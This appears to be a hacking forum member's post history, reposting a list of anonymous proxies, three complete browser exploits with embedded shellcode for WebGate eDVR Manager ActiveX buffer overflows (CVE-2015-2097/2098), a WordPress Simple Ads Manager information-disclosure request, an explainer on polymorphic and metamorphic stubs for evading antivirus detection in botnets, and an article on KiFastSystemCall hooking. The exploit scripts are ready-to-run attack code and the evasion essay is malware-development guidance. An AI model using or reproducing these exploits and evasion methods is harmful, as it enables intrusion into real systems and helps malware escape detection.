Jump to content

Aerosol

Active Members
 View Profile  See their activity

  • Posts

    3453

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Everything posted by Aerosol

  1. Aerosol
    Level 1 (Elite) » Level 2 (Anony) » Level 3 (Trans) » Socks4 » Socks5 ProxyFire
  2. Aerosol
    Proxy Level 1 (Elite) IP Port Type Country Area City Last update(ago) 8080 High Anonymous UNITED STATES MASSACHUSETTS WAKEFIELD 239:48:04 3128 High Anonymous - - - 239:58:53 87 High Anonymous UNITED STATES MARYLAND GERMANTOWN 242:24:15 8080 High Anonymous UNITED STATES TENNESSEE NASHVILLE 242:25:15 80 High Anonymous UNITED STATES ARIZONA TEMPE 242:25:15 87 High Anonymous UNITED STATES MARYLAND GERMANTOWN 242:25:15 3129 High Anonymous - - - 243:25:54 87 High Anonymous UNITED STATES MARYLAND GERMANTOWN 245:09:26 87 High Anonymous UNITED STATES MARYLAND GERMANTOWN 245:09:26 8080 High Anonymous - - - 245:09:26 80 High Anonymous - - - 245:28:27 8080 High Anonymous - - - 245:28:27 8080 High Anonymous - - - 245:29:28 82 High Anonymous - - - 245:37:30 8080 High Anonymous INDONESIA JAKARTA RAYA (DJAKARTA RAYA) JAKARTA 245:37:30 8080 High Anonymous - - - 245:41:31 8080 High Anonymous UNITED STATES - - 245:41:31 8080 High Anonymous - - - 245:41:31 8080 High Anonymous UNITED STATES CALIFORNIA MOUNTAIN VIEW 245:41:31 80 High Anonymous UNITED STATES ARIZONA TEMPE 245:58:34 8080 High Anonymous UNITED STATES WISCONSIN SUN PRAIRIE 245:58:34 80 High Anonymous NETHERLANDS NOORD-HOLLAND AMSTERDAM 245:58:34 8080 High Anonymous UNITED STATES TENNESSEE NASHVILLE 246:38:35 8080 High Anonymous CANADA ONTARIO OTTAWA 246:39:36 8080 High Anonymous INDONESIA JAKARTA RAYA (DJAKARTA RAYA) JAKARTA 246:39:36 8080 High Anonymous - - - 246:39:36 80 High Anonymous - - - 246:39:36 80 High Anonymous UNITED STATES OREGON ROSEBURG 246:39:36 8080 High Anonymous - - - 246:39:36 8080 High Anonymous BANGLADESH DHAKA DHAKA 246:39:36 8080 High Anonymous CANADA ONTARIO OTTAWA 246:40:37 8080 High Anonymous UNITED STATES CALIFORNIA MOUNTAIN VIEW 246:40:37 8080 High Anonymous - - - 246:40:37 8080 High Anonymous CANADA ONTARIO OTTAWA 246:40:37 8080 High Anonymous - - - 246:40:37 8080 High Anonymous - - - 246:40:37 80 High Anonymous UNITED STATES WISCONSIN MILWAUKEE 248:38:39 80 High Anonymous UNITED STATES PENNSYLVANIA PITTSBURGH 248:38:39 80 High Anonymous - - - 248:38:39 80 High Anonymous UNITED STATES MASSACHUSETTS CAMBRIDGE 248:38:39 80 High Anonymous UNITED STATES VIRGINIA CHARLOTTESVILLE 248:38:39 80 High Anonymous UNITED STATES PENNSYLVANIA PITTSBURGH 248:38:39 80 High Anonymous ARGENTINA - - 248:38:39 80 High Anonymous BRAZIL - - 248:38:39 80 High Anonymous UNITED STATES MARYLAND BALTIMORE 249:47:10 8080 High Anonymous KOREA, REPUBLIC OF KYONGGI-DO SONGNAM 249:47:10 80 High Anonymous INDONESIA - - 249:51:14 80 High Anonymous GERMANY BERLIN BERLIN 249:51:14 80 High Anonymous - - - 250:03:25 8081 High Anonymous CHINA GUANGDONG GUANGZHOU 250:11:33 80 High Anonymous - - - 250:16:38 80 High Anonymous BELGIUM BRUSSELS BRUSSELS 250:17:39 8080 High Anonymous THAILAND - - 250:17:39 8080 High Anonymous KOREA, REPUBLIC OF KYONGGI-DO SEOUL 250:18:40 80 High Anonymous INDIA - - 250:18:40 80 High Anonymous - - - 250:19:41 61249 High Anonymous - - - 250:19:41 80 High Anonymous BAHRAIN - - 250:19:41 80 High Anonymous UNITED STATES NEW YORK NEW YORK 250:20:42 80 High Anonymous - - - 250:21:43 80 High Anonymous BAHRAIN - - 250:34:53 80 High Anonymous JAPAN TOKYO TOKYO 250:34:53 80 High Anonymous LATVIA - - 250:35:54 82 High Anonymous CHINA - - 250:50:06 6515 High Anonymous - - - 250:50:06 80 High Anonymous BAHRAIN - - 250:52:08 80 High Anonymous ECUADOR - - 250:53:09 80 High Anonymous SPAIN - - 250:53:09 80 High Anonymous KAZAKHSTAN - - 250:53:09 20459 High Anonymous - - - 250:54:10 80 High Anonymous ISRAEL TEL AVIV RAMAT GAN 250:57:14 8080 High Anonymous - - - 250:58:15 80 High Anonymous - - - 250:58:15 80 High Anonymous UNITED STATES CALIFORNIA SUNNYVALE 250:58:15 80 High Anonymous - - - 250:59:16 8080 High Anonymous - - - 251:02:19 80 High Anonymous CHINA SHANGHAI SHANGHAI 251:02:19 80 High Anonymous CHINA BEIJING BEIJING 251:03:20 80 High Anonymous FRANCE PAYS DE LA LOIRE NANTES 251:03:20 80 High Anonymous - - - 251:03:20 80 High Anonymous TURKEY AYDIN AYDIN 251:03:20 80 High Anonymous - - - 251:03:20 80 High Anonymous - - - 251:03:20 80 High Anonymous BAHRAIN AL MANAMAH MANAMA 251:04:21 8080 High Anonymous SAUDI ARABIA - - 251:04:21 9000 High Anonymous - - - 252:21:08 9980 High Anonymous CHINA GUANGDONG SHENZHEN 252:22:09 8080 High Anonymous TAIWAN T'AI-PEI TAIPEI 252:22:26 1998 High Anonymous CHINA BEIJING BEIJING 252:22:26 1998 High Anonymous - - - 252:22:26 8080 High Anonymous ETHIOPIA - - 252:41:10 808 High Anonymous INDIA DELHI NEW DELHI 252:42:11 8080 High Anonymous - - - 254:54:07 1998 High Anonymous - - - 254:54:29 808 High Anonymous - - - 254:54:29 8080 High Anonymous VENEZUELA DISTRITO FEDERAL CARACAS 255:00:44 6666 High Anonymous CHINA BEIJING BEIJING 255:00:44 8081 High Anonymous BRAZIL S?O PAULO S?O PAULO 255:00:44 80 High Anonymous EGYPT - - 255:00:44 80 High Anonymous CHINA BEIJING BEIJING 255:01:45 80 High Anonymous - - - 255:03:49 8118 High Anonymous - - - 255:03:49 80 High Anonymous UNITED STATES TEXAS FT. WORTH 255:04:50 80 High Anonymous GERMANY - - 255:05:51 8080 High Anonymous INDIA MADHYA PRADESH INDORE 255:05:51 80 High Anonymous NIGERIA - - 255:06:53 4263 High Anonymous - - - 255:07:55 80 High Anonymous UNITED STATES VIRGINIA MC LEAN 255:07:55 8080 High Anonymous UNITED KINGDOM - - 255:08:56 80 High Anonymous - - - 255:08:56 80 High Anonymous FRANCE ALSACE STRASBOURG 255:09:57 80 High Anonymous SPAIN - - 255:13:01 443 High Anonymous SWEDEN - - 255:13:01 6745 High Anonymous UNITED KINGDOM - - 255:15:03 8080 High Anonymous UNITED STATES TEXAS SAN ANTONIO 255:15:03 80 High Anonymous - - - 255:15:03 80 High Anonymous - - - 255:17:05 80 High Anonymous INDIA DELHI DELHI 255:20:09 1998 High Anonymous - - - 255:20:31 80 High Anonymous CHINA BEIJING BEIJING 255:21:10 18186 High Anonymous CHINA BEIJING BEIJING 255:22:44 80 High Anonymous RUSSIAN FEDERATION - - 255:24:13 8909 High Anonymous CHINA - - 255:24:13 8080 High Anonymous CHINA SHANDONG SHANGHAI 255:26:15 8080 High Anonymous - - - 255:27:08 8080 High Anonymous - - - 255:28:08 8909 High Anonymous - - - 255:28:18 8080 High Anonymous AUSTRIA WIEN VIENNA 255:29:19 80 High Anonymous KUWAIT - - 255:29:19 80 High Anonymous VENEZUELA DISTRITO FEDERAL CARACAS 255:29:19 8080 High Anonymous KOREA, REPUBLIC OF - - 255:31:21 80 High Anonymous POLAND - - 255:31:21 80 High Anonymous GERMANY - - 255:32:22 80 High Anonymous BRAZIL S?O PAULO S?O PAULO 255:32:22 8080 High Anonymous - - - 255:32:22 80 High Anonymous KAZAKHSTAN - - 255:32:22 8080 High Anonymous VENEZUELA - - 255:32:22 80 High Anonymous - - - 255:32:22 80 High Anonymous - - - 255:32:22 2000 High Anonymous INDONESIA - - 255:32:22 80 High Anonymous - - - 255:32:22 80 High Anonymous - - - 255:32:22 80 High Anonymous - - - 255:32:22 8088 High Anonymous UKRAINE MISTO KYYIV KIEV 255:32:22 8080 High Anonymous KENYA - - 255:32:22 80 High Anonymous - - - 255:32:22 80 High Anonymous - - - 255:32:22 8090 High Anonymous CHINA BEIJING HENAN 255:32:22 80 High Anonymous BOLIVIA - - 255:32:22 8090 High Anonymous CHINA GUANGDONG GUANGZHOU 255:32:22 Source
  3. Aerosol
    <html> <!-- # Exploit Title: WebGate eDVR Manager Connect Method Stack Buffer Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Tested on: Windows XP SP3 using IE8 # CVE : 2015-2097 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPSerialPort.dll" prototype = "Sub Connect ( ByVal IPAddr As String , ByVal PortNum As Integer , ByVal UserID As String , ByVal Password As String )" progid = "WESPSERIALPORTLib.WESPSerialPortCtrl" Tested on IE8 Author: Praveen Darshanam http://blog.disects.com/ http://darshanams.blogspot.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:BAAA6516-267C-466D-93F5-C504EF973837' id='target'> </object> <script> var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<1664; i++) { arg3 += "B"; } var nseh = "\xeb\x10PD"; //WESPSerialPort.dll(0x100104e7 = pop pop ret) var seh = "\xe7\x04\x01\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(8000 - (arg3.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg3 + nseh + seh + nops + shellcode + buff2; target.Connect(arg1, arg2, fbuff ,arg4); </script> </html> Source
  4. Aerosol
    <html> <!-- # Exploit Title: WebGate eDVR Manager SiteChannel Property Stack Buffer Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: eDVR Manager 2.6.4 # Tested on: Windows XP SP3 using IE6/7/8 # CVE : 2015-2098 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Property Let SiteChannel ( ByVal SiteSerialNumber As String , ByVal indx As Integer ) As Long" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Tested on IE6/7/8 Author: Praveen Darshanam http://darshanams.blogspot.com/ http://blog.disects.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <script> var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<128; i++) { arg1 += "B"; } var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.SiteChannel(fbuff ,arg2 ) = arg3; </script> </html> Source
  5. Aerosol
    <html> <!-- # Exploit Title: WebGate eDVR Manager AudioOnlySiteChannel Property Stack Buffer Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: eDVR Manager 2.6.4 # Tested on: Windows XP SP3 using IE6/7/8 # CVE : 2015-2098 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Property Let AudioOnlySiteChannel ( ByVal SiteSerialNumber As String , ByVal Channel As Integer ) As Long" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Tested on IE6/7/8 Author: Praveen Darshanam http://darshanams.blogspot.com/ http://blog.disects.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <script> var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<128; i++) { arg1 += "B"; } var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.AudioOnlySiteChannel(fbuff ,arg2 ) = arg3 </script> </html> Source
  6. Aerosol
    #Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2826 #Author: Nguyen Hung Tuan (tuan.h.nguyen@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 17 action=load_users + Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,... + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Image: http://www.itas.vn/uploads/newsother/disclosure.png + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie s-in-Hakin9-IT-Security-Magazine-78.html?language=en Best regard -------------------------------- ITAS Team (www.itas.vn) Source
  7. Aerosol
    Before we start it's probably best to explain some things: Signature - A pattern of bytes used by an antivirus to identify malicious executables, this could be a string, parts of a function, or a hash. Crypting - This is the most common way of evading antivirus detections, it works by encrypting the malicious executable so the antivirus cannot match the malicious code to existing signatures. Payload - The malicious executable which is encrypted to evade detections, this is attached to the stub in some way (stored as a resource, added after then end of file, appended to a new or existing section). Stub - A simple program responsible for decrypting the payload and executing it in memory. Due to the payload being encrypted, antiviruses will attempt to generate signatures to match the stub's code, but because the stub is small and simple it can be easily modified to evade existing signatures. Polymorphism Polymorphism is a solution to a problem mainly found with worms/botnet: When an AV adds a new signature that detects the malicious executable, the infected file will be quarantined, leaving the malware running in memory until reboot. If a botmaster is running a botnet with thousands of bots, each time the stub is detected he's likely to lose a few hundred bots, his only choice: To keep updating the bots with a new stub before the previous one is detected (which for large botnets can be every few hours), leaving the hacker with very little free time. A solution to this would be to write malware capable of programmatically generating a unique stub and replacing the old one on execution, resulting in each computer having a different stub; this is know as polymorphism. there's a few ways to programmatically create unique code that performs the same function as the previous. Block Mutation A lot of assembly instructions can be freely movable, whilst some cannot. An instruction using a relative address (such as a jump or call), when moved will point to a different location, breaking the code; freely movable instructions such as those using absolute addresses or only registers can be moved anywhere. Block based polymoprphism works by breaking the code down into small blocks, which are then numbered; the number specifies the order in which they execute and the block is either marked as movable or immovable based on its containing instruction. The mutation engine can then reorder, relocate, or separate the movable block; using jumps or similar instructions to link them together so that they execute in the correct order. Junk code (random instructions which are never actually executed) can also be added between blocks to add more entropy and change the executable size. Register Swapping It's possible to write the code in such a way that registers can easily be switched out, for instance all occurrences of edx within a function could be replaced with ecx, changing a lot of bytes within the application. The only problem with this approach is there's only a few usable registers, making it easy to exhaust all possible combinations, and it's still possible to generate signatures based on the layout of the instructions. Internal Assembler + Intermediate Language A very effective approach is to embed an assembler within the payload, as well as create an intermediate language (IL) which the polymorphic engine uses to create ASM on the fly. A simple example would be the following IL code. pmov Reg1, 5 add eax, Reg1 In this example instructions prefixed with p will be mutated at an instruction level, whilst those without a prefix will just be assigned a register and compiled as ASM. The IL engine would then use a seed to randomly generate the p-prefixed instructions by picking an instruction, or group of instructions, to perform the operation, as well as assign a register to Reg1 and Reg2. The array of instructions to handle pmov would look something like this: push val pop reg mov reg, val xor reg, reg add reg, val Once the engine has picked which instruction it wishes to use, it would then fill in the register and value, then compile it to ASM. Here are some examples of final outputs. push 5 pop edx add eax, edx mov ecx, 5 add eax, ecx xor ebx, ebx add ebx, 5 add eax, ebx By using an IL, we avoid having to first disassemble the stub code before mutating it. Metamorphism Today advanced metamorphic malware which can efficiently evade signature detection is nearly impossible, but back in the days of DOS / 95 / 98 viruses, it has been achieved multiple times. The idea of metamorphism is to take polymorphism a step further and instead of encrypting the malicious executable and mutating the stub, the entire malicious executable is mutated, including the code required to perform the mutation. Malware that is required to create a new, unique copy of itself on every propagation is also required to disassemble previously mutated code and regulate size (because instructions can be mutated into multiple instructions, it's important to be able to do the opposite or the executable grows almost exponentially with every mutation). Due to the amount of consideration and effort that would have to go into creating modern metamorphic malware, most programmers opt to use polymorphism instead, as this allows them to generate output from a temporary representation. A simple mistake during disassembling could result in the executable ceasing to work, and it's a lot harder to debug and test metamorphism in large applications. Source
  8. Aerosol
    Usually I don't post things like this, but because KiFastSystemCall hooking only works on x86 systems and doesn't work on Windows 8 or above, it no longer has much use in malware. There are also multiple public implementations for this method, just not very elegant, which I hope to correct. If you haven't read my previous article about this topic, or need a refresher, you can find it here. Performing a System Call KiFastSystemCall has a very strange calling convention (if you can call it that). Each native function (Ex: NtCreateFile) corresponds to a function with the same name in the SSDT. In order to make the transition from user mode to kernel mode, the instruction "sysenter" is used. I don't want to go into great detail on how the sysenter instruction actually enters kernel mode, as that would take up the entire page, but I'll explain the basics: The SSDT is an array of addresses for each native function. The number you see being moved into the eax register is known as its ordinal, and is the position within the SSDT where that functions address is located. When the sysenter instruction is executed the kernel reads the ordinal from eax and uses it to call the corresponding function in the SSDT, before returning execution to usemode. Something important to note is that the native function simply calls KiFastSystemCall and doesn't even set up a stack frame, meaning the address of the first parameter can only be accessed using [esp+8], so we can't just hook KiFastSystemCall with a C function, as this matches no standard calling convention (which is what makes the method so tricky to implement). Dispatching Calls Since the last article I've improved on the dispatching method, which now has two purposes: Determining which native function made the call to KiFastSystemCall, so we can properly handle it. Setting up the stack in such a way that we can access the parameters using plain C. Dispatching Normally we'd hook each individual function we want to intercept with a single handler (proxy), but all native functions call KiFastSystemCall, so we need to think differently. As I explained earlier, the SSDT is an array of addresses and the ordinal (which is in eax when KiFastSystemCall is invoked), corresponds to the position of that function's address within the SSDT. Using this knowledge we can do the same: We create an array of addresses for the the proxy functions and use the ordinal to locate the correct handler using the ordinal in eax. For our SSDT each entry will be 8 bytes, so the handler needs to be placed at our_ssdt[2*ordinal] (in order to get the ordinal for a native function we just read 4 bytes starting at the 2nd byte of the function). You're probably wondering why each entry for our SSDT is 8 bytes, instead of 4; this is because in order to set up the stack before calling the proxy, we need to know how many parameters were passed to KiFastSystemCall (we store the proxy address as the first 4 bytes and the number of parameter as the rest). Preparing the Stack When KiFastSystemCall is invoked, there are two return addresses between the stack pointer and the function parameters (the return from KiFastSystemCall to the native function and the return from the native function). In order to call the proxy function we will get the number of parameter for the function from our_ssdt[2*ordinal+4] and push them to the stack again, in stdcall format (the proxy function is responsible for removing them from the stack). The last thing that is pushed to the stack before we call the proxy is the eax register (the ordinal), we will need this later if we wish to call the original, non hooked, version of KiFastSystemCall. The Code FstHook - This is my own C library which allows a program to easily hook any number of native function using a single hook on KiFastSystemCall. https://github.com/MalwareTech/FstHook/ Source
  9. Aerosol
